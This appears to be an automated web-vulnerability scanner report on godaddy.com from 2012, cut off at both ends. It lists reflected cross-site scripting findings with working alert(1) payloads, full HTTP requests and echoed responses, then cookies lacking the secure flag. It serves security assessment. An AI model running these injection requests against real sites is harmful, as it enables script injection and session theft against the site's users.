loadQuickTour9bf28;alert(1)//f4744af696b({"Html":"\r\n \u003ccenter\u003e\r\n \u003cdiv id=\"cds-slides-tour\"\u003e\r\n \u003ctable cellspacing=\"0\" cellpadding=\"0\" border=\"0\"\u003e\r\n \u003ctr\u003e\r\n
...[SNIP]...

1.6. https://www.godaddy.com/domains/customize/JsonContent/ActivateYourDomain.aspx [targetDivId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.godaddy.com
Path:   /domains/customize/JsonContent/ActivateYourDomain.aspx

Issue detail

The value of the targetDivId request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8eeb5'%3balert(1)//ec426d566ba was submitted in the targetDivId parameter. This input was echoed as 8eeb5';alert(1)//ec426d566ba in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /domains/customize/JsonContent/ActivateYourDomain.aspx?targetDivId=customizeSteps_4ActivateYourDomain_Content8eeb5'%3balert(1)//ec426d566ba& HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/javascript; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=zuu3g2tcyi0hd3phmrfiuvxh; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Date: Mon, 05 Mar 2012 01:43:44 GMT
Connection: close
Content-Length: 322

$('#customizeSteps_4ActivateYourDomain_Content8eeb5';alert(1)//ec426d566ba').trigger('jsonContentLoaded', {"Html":"","TargetDivID":"customizeSteps_4ActivateYourDomain_Content8eeb5\u0027;alert(1)//ec426d566ba","Properties":{"sessionExpired":true,"isComplete":false,"allRequire
...[SNIP]...

1.7. https://www.godaddy.com/domains/customize/JsonContent/DomainPrivacyAndProtection.aspx [targetDivId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.godaddy.com
Path:   /domains/customize/JsonContent/DomainPrivacyAndProtection.aspx

Issue detail

The value of the targetDivId request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b34d4'%3balert(1)//66958dce083 was submitted in the targetDivId parameter. This input was echoed as b34d4';alert(1)//66958dce083 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /domains/customize/JsonContent/DomainPrivacyAndProtection.aspx?targetDivId=customizeSteps_3YourPrivacyandDomainProtection_Contentb34d4'%3balert(1)//66958dce083& HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/javascript; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=1mhnpkotg5pz304gspoylx5q; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Date: Mon, 05 Mar 2012 01:43:43 GMT
Connection: close
Content-Length: 346

$('#customizeSteps_3YourPrivacyandDomainProtection_Contentb34d4';alert(1)//66958dce083').trigger('jsonContentLoaded', {"Html":"","TargetDivID":"customizeSteps_3YourPrivacyandDomainProtection_Contentb34d4\u0027;alert(1)//66958dce083","Properties":{"sessionExpired":true,"isComplete":false
...[SNIP]...

1.8. https://www.godaddy.com/domains/customize/JsonContent/DomainRegistrationInformation.aspx [targetDivId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.godaddy.com
Path:   /domains/customize/JsonContent/DomainRegistrationInformation.aspx

Issue detail

The value of the targetDivId request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6a9a4'%3balert(1)//b67d652de68 was submitted in the targetDivId parameter. This input was echoed as 6a9a4';alert(1)//b67d652de68 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /domains/customize/JsonContent/DomainRegistrationInformation.aspx?targetDivId=customizeSteps_1DomainRegistrationInformation_Content6a9a4'%3balert(1)//b67d652de68& HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/javascript; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=4jxloj0ofg20mejbikanz2ce; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Date: Mon, 05 Mar 2012 01:43:42 GMT
Connection: close
Content-Length: 344

$('#customizeSteps_1DomainRegistrationInformation_Content6a9a4';alert(1)//b67d652de68').trigger('jsonContentLoaded', {"Html":"","TargetDivID":"customizeSteps_1DomainRegistrationInformation_Content6a9a4\u0027;alert(1)//b67d652de68","Properties":{"sessionExpired":true,"isComplete":false,
...[SNIP]...

1.9. https://www.godaddy.com/domains/customize/JsonContent/DomainSettings.aspx [targetDivId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.godaddy.com
Path:   /domains/customize/JsonContent/DomainSettings.aspx

Issue detail

The value of the targetDivId request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5396d'%3balert(1)//54b15509a47 was submitted in the targetDivId parameter. This input was echoed as 5396d';alert(1)//54b15509a47 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /domains/customize/JsonContent/DomainSettings.aspx?targetDivId=customizeSteps_2YourDomainSettings_Content5396d'%3balert(1)//54b15509a47& HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/javascript; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=y1mq0gwfmuqh3nqjenrxbiya; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Date: Mon, 05 Mar 2012 01:43:41 GMT
Connection: close
Content-Length: 322

$('#customizeSteps_2YourDomainSettings_Content5396d';alert(1)//54b15509a47').trigger('jsonContentLoaded', {"Html":"","TargetDivID":"customizeSteps_2YourDomainSettings_Content5396d\u0027;alert(1)//54b15509a47","Properties":{"sessionExpired":true,"isComplete":false,"allRequire
...[SNIP]...

1.10. https://www.godaddy.com/gdshop/browser_update.asp [User-Agent HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.godaddy.com
Path:   /gdshop/browser_update.asp

Issue detail

The value of the User-Agent HTTP header is copied into the HTML document as plain text between tags. The payload dafde<script>alert(1)</script>fb9af668e7a was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /gdshop/browser_update.asp?msvar=true HTTP/1.1
Host: www.godaddy.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13dafde<script>alert(1)</script>fb9af668e7a
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://burp/show/23
Cookie: visitor=vid=f2b54a8e-6e54-487a-ba8b-057ce9ed41db; test=ok; serverVersion=A; domainYardVal=%2D1; ASPSESSIONIDQUBACAQD=LJHOPMDCEKEPLKEAGHMHKDIL

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/html
Expires: Wed, 01 Jan 1997 12:00:00 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
Set-Cookie: traffic=referringdomain=&referringpath=&shopper=&querystring=msvar%3Dtrue&server=M1PWCORPWEB152&ci=&isc=&privatelabelid=1&page=%2Fgdshop%2Fbrowser%5Fupdate%2Easp&sitename=www%2Egodaddy%2Ecom&clientip=174%2E36%2E218%2E2&status=200+OK&referrer=http%3A%2F%2Fburp%2Fshow%2F23&cookies=1; domain=.godaddy.com; path=/
Set-Cookie: serverVersion=A; domain=.godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; expires=Fri, 08-Mar-2013 07:00:00 GMT; domain=.godaddy.com; path=/
Set-Cookie: domainYardVal=%2D1; domain=.godaddy.com; path=/
Set-Cookie: adc1=US; expires=Thu, 15-Mar-2012 07:00:00 GMT; domain=.godaddy.com; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Thu, 08 Mar 2012 20:58:06 GMT
Content-Length: 16723

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html>
<head>
<title>Browser Update Page</title>
<meta http-equiv="Content-T
...[SNIP]...
</B>Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13dafde<script>alert(1)</script>fb9af668e7a</b>
...[SNIP]...

1.11. https://www.godaddy.com/gdshop/browser_update.asp [User-Agent HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.godaddy.com
Path:   /gdshop/browser_update.asp

Issue detail

The value of the User-Agent HTTP header is copied into the HTML document as plain text between tags. The payload add8b<script>alert(1)</script>398565ca2c06cdf23 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /gdshop/browser_update.asp?msvar=true&renderableItem=%2Fshow%2F27 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)add8b<script>alert(1)</script>398565ca2c06cdf23
Accept-Encoding: gzip, deflate
Cookie: adc1=US; currency1=potableSourceStr=USD; serverVersion=A; domainYardVal=%2D1; traffic=referringdomain=&referringpath=&shopper=&querystring=msvar%3Dtrue&server=M1PWCORPWEB137&ci=&isc=&privatelabelid=1&page=%2Fgdshop%2Fbrowser%5Fupdate%2Easp&sitename=www%2Egodaddy%2Ecom&clientip=174%2E36%2E218%2E2&status=200+OK&referrer=&cookies=1; preferences1=_sid=&gdshop_currencyType=USD&dataCenterCode=US; ASPSESSIONIDQGQBBDAA=LIKAMEKBEMKIHPKFPEGDMAGF; ASP.NET_SessionId=3ecy12tsjjozpeslsfeq1ee5
Host: www.godaddy.com
Connection: Keep-Alive
Cache-Control: no-cache
Accept-Language: en-US

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/html
Expires: Wed, 01 Jan 1997 12:00:00 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
Set-Cookie: domainYardVal=%2D1; domain=.godaddy.com; path=/
Set-Cookie: traffic=server=M1PWCORPWEB152&sitename=www%2Egodaddy%2Ecom&cookies=1&clientip=174%2E36%2E218%2E2&status=200+OK&referrer=&ci=&isc=&privatelabelid=1&page=%2Fgdshop%2Fbrowser%5Fupdate%2Easp&referringdomain=&referringpath=&shopper=&querystring=msvar%3Dtrue%26renderableItem%3D%252Fshow%252F27; domain=.godaddy.com; path=/
Set-Cookie: serverVersion=A; domain=.godaddy.com; path=/
Set-Cookie: ASPSESSIONIDQUBACAQD=LAIOPMDCAMIBIMAOBMJIJOIP; secure; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Thu, 08 Mar 2012 21:00:59 GMT
Content-Length: 16742

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html>
<head>
<title>Browser Update Page</title>
<meta http-equiv="Content-T
...[SNIP]...
</B>Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)add8b<script>alert(1)</script>398565ca2c06cdf23</b>
...[SNIP]...

1.12. https://www.godaddy.com/gdshop/change/ChangeRequest.asp [User-Agent HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.godaddy.com
Path:   /gdshop/change/ChangeRequest.asp

Issue detail

The value of the User-Agent HTTP header is copied into the HTML document as plain text between tags. The payload 58638<script>alert(1)</script>dd3f04bac51 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /gdshop/change/ChangeRequest.asp HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)58638<script>alert(1)</script>dd3f04bac51
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Length: 16684
Content-Type: text/html
Expires: Mon, 27 Feb 2012 03:03:22 GMT
Server: Microsoft-IIS/7.5
Set-Cookie: currency1=potableSourceStr=USD; expires=Mon, 04-Mar-2013 07:00:00 GMT; domain=.godaddy.com; path=/
Set-Cookie: traffic=referringdomain=&referringpath=&shopper=&querystring=msvar%3Dtrue&server=M1PWCORPWEB137&ci=&isc=&privatelabelid=1&page=%2Fgdshop%2Fbrowser%5Fupdate%2Easp&sitename=www%2Egodaddy%2Ecom&clientip=174%2E36%2E218%2E2&status=200+OK&referrer=&cookies=1; domain=.godaddy.com; path=/
Set-Cookie: serverVersion=A; domain=.godaddy.com; path=/
Set-Cookie: domainYardVal=%2D1; domain=.godaddy.com; path=/
Set-Cookie: adc1=US; expires=Sun, 11-Mar-2012 07:00:00 GMT; domain=.godaddy.com; path=/
Set-Cookie: ASPSESSIONIDQGQBBDAA=CKKAMEKBDCPGJPBEKHMEIFJF; secure; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Mon, 05 Mar 2012 01:43:21 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html>
<head>
<title>Browser Update Page</title>
<meta http-equiv="Content-T
...[SNIP]...
</B>Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)58638<script>alert(1)</script>dd3f04bac51</b>
...[SNIP]...

1.13. https://www.godaddy.com/gdshop/myportal/consolidate.asp [User-Agent HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.godaddy.com
Path:   /gdshop/myportal/consolidate.asp

Issue detail

The value of the User-Agent HTTP header is copied into the HTML document as plain text between tags. The payload 71420<script>alert(1)</script>a239214ac48 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /gdshop/myportal/consolidate.asp HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)71420<script>alert(1)</script>a239214ac48
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Length: 16684
Content-Type: text/html
Expires: Mon, 27 Feb 2012 03:03:23 GMT
Server: Microsoft-IIS/7.5
Set-Cookie: currency1=potableSourceStr=USD; expires=Mon, 04-Mar-2013 07:00:00 GMT; domain=.godaddy.com; path=/
Set-Cookie: traffic=referringdomain=&referringpath=&shopper=&querystring=msvar%3Dtrue&server=M1PWCORPWEB137&ci=&isc=&privatelabelid=1&page=%2Fgdshop%2Fbrowser%5Fupdate%2Easp&sitename=www%2Egodaddy%2Ecom&clientip=174%2E36%2E218%2E2&status=200+OK&referrer=&cookies=1; domain=.godaddy.com; path=/
Set-Cookie: serverVersion=A; domain=.godaddy.com; path=/
Set-Cookie: domainYardVal=%2D1; domain=.godaddy.com; path=/
Set-Cookie: adc1=US; expires=Sun, 11-Mar-2012 07:00:00 GMT; domain=.godaddy.com; path=/
Set-Cookie: ASPSESSIONIDQGQBBDAA=IKKAMEKBBHHADHMBJIPGDBPN; secure; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Mon, 05 Mar 2012 01:43:22 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html>
<head>
<title>Browser Update Page</title>
<meta http-equiv="Content-T
...[SNIP]...
</B>Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)71420<script>alert(1)</script>a239214ac48</b>
...[SNIP]...

1.14. https://www.godaddy.com/gdshop/registrar/search.asp [User-Agent HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.godaddy.com
Path:   /gdshop/registrar/search.asp

Issue detail

The value of the User-Agent HTTP header is copied into the HTML document as plain text between tags. The payload fcff1<script>alert(1)</script>8bceeb14a14 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /gdshop/registrar/search.asp HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)fcff1<script>alert(1)</script>8bceeb14a14
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Length: 16684
Content-Type: text/html
Expires: Mon, 27 Feb 2012 03:03:23 GMT
Server: Microsoft-IIS/7.5
Set-Cookie: currency1=potableSourceStr=USD; expires=Mon, 04-Mar-2013 07:00:00 GMT; domain=.godaddy.com; path=/
Set-Cookie: traffic=referringdomain=&referringpath=&shopper=&querystring=msvar%3Dtrue&server=M1PWCORPWEB137&ci=&isc=&privatelabelid=1&page=%2Fgdshop%2Fbrowser%5Fupdate%2Easp&sitename=www%2Egodaddy%2Ecom&clientip=174%2E36%2E218%2E2&status=200+OK&referrer=&cookies=1; domain=.godaddy.com; path=/
Set-Cookie: serverVersion=A; domain=.godaddy.com; path=/
Set-Cookie: domainYardVal=%2D1; domain=.godaddy.com; path=/
Set-Cookie: adc1=US; expires=Sun, 11-Mar-2012 07:00:00 GMT; domain=.godaddy.com; path=/
Set-Cookie: ASPSESSIONIDQGQBBDAA=JKKAMEKBOMLPDHOALOKENPOJ; secure; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Mon, 05 Mar 2012 01:43:22 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html>
<head>
<title>Browser Update Page</title>
<meta http-equiv="Content-T
...[SNIP]...
</B>Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)fcff1<script>alert(1)</script>8bceeb14a14</b>
...[SNIP]...

1.15. https://www.godaddy.com/gdshop/shopper_lookup.asp [User-Agent HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.godaddy.com
Path:   /gdshop/shopper_lookup.asp

Issue detail

The value of the User-Agent HTTP header is copied into the HTML document as plain text between tags. The payload 14e3a<script>alert(1)</script>2d59013f7bc was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /gdshop/shopper_lookup.asp HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)14e3a<script>alert(1)</script>2d59013f7bc
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Length: 16684
Content-Type: text/html
Expires: Mon, 27 Feb 2012 03:03:17 GMT
Server: Microsoft-IIS/7.5
Set-Cookie: currency1=potableSourceStr=USD; expires=Mon, 04-Mar-2013 07:00:00 GMT; domain=.godaddy.com; path=/
Set-Cookie: traffic=referringdomain=&referringpath=&shopper=&querystring=msvar%3Dtrue&server=M1PWCORPWEB137&ci=&isc=&privatelabelid=1&page=%2Fgdshop%2Fbrowser%5Fupdate%2Easp&sitename=www%2Egodaddy%2Ecom&clientip=174%2E36%2E218%2E2&status=200+OK&referrer=&cookies=1; domain=.godaddy.com; path=/
Set-Cookie: serverVersion=A; domain=.godaddy.com; path=/
Set-Cookie: domainYardVal=%2D1; domain=.godaddy.com; path=/
Set-Cookie: adc1=US; expires=Sun, 11-Mar-2012 07:00:00 GMT; domain=.godaddy.com; path=/
Set-Cookie: ASPSESSIONIDQGQBBDAA=LIKAMEKBEMKIHPKFPEGDMAGF; secure; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Mon, 05 Mar 2012 01:43:17 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html>
<head>
<title>Browser Update Page</title>
<meta http-equiv="Content-T
...[SNIP]...
</B>Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)14e3a<script>alert(1)</script>2d59013f7bc</b>
...[SNIP]...

2. SSL cookie without secure flag set  previous  next
There are 26 instances of this issue:

Issue background

If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.

Issue remediation

The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.


2.1. https://www.godaddy.com/Domains/Search.aspx  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.godaddy.com
Path:   /Domains/Search.aspx

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Domains/Search.aspx HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=k2jqsg0don5vxc43ddmelvcb; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=k2jqsg0don5vxc43ddmelvcb; path=/; HttpOnly
Set-Cookie: preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; domain=godaddy.com; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:43:13 GMT; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:43:13 GMT; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:43:13 GMT; path=/
Set-Cookie: SplitValue1=8; domain=godaddy.com; expires=Tue, 06-Mar-2012 01:43:13 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/Domains/Search.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=&referringdomain=&split=8; domain=godaddy.com; path=/
Set-Cookie: GoogleADServicesgoogleadwordssearch=dcmduaecwdrcwejfwaajofhjhgcccdua; domain=godaddy.com; expires=Sat, 05-Mar-2022 01:43:13 GMT; path=/
Set-Cookie: BlueLithium_domainsearch=dcmduaecwdrcwejfwaajofhjhgcccdua; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:43:13 GMT
Connection: close
Content-Length: 183951


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1">
<
...[SNIP]...

2.2. https://www.godaddy.com/Payment/payment-options.aspx  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.godaddy.com
Path:   /Payment/payment-options.aspx

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Payment/payment-options.aspx HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=znipwzi0ukgf3qa0ecrv3t0n; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=znipwzi0ukgf3qa0ecrv3t0n; path=/; HttpOnly
Set-Cookie: preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; domain=godaddy.com; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:43:27 GMT; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:43:27 GMT; path=/
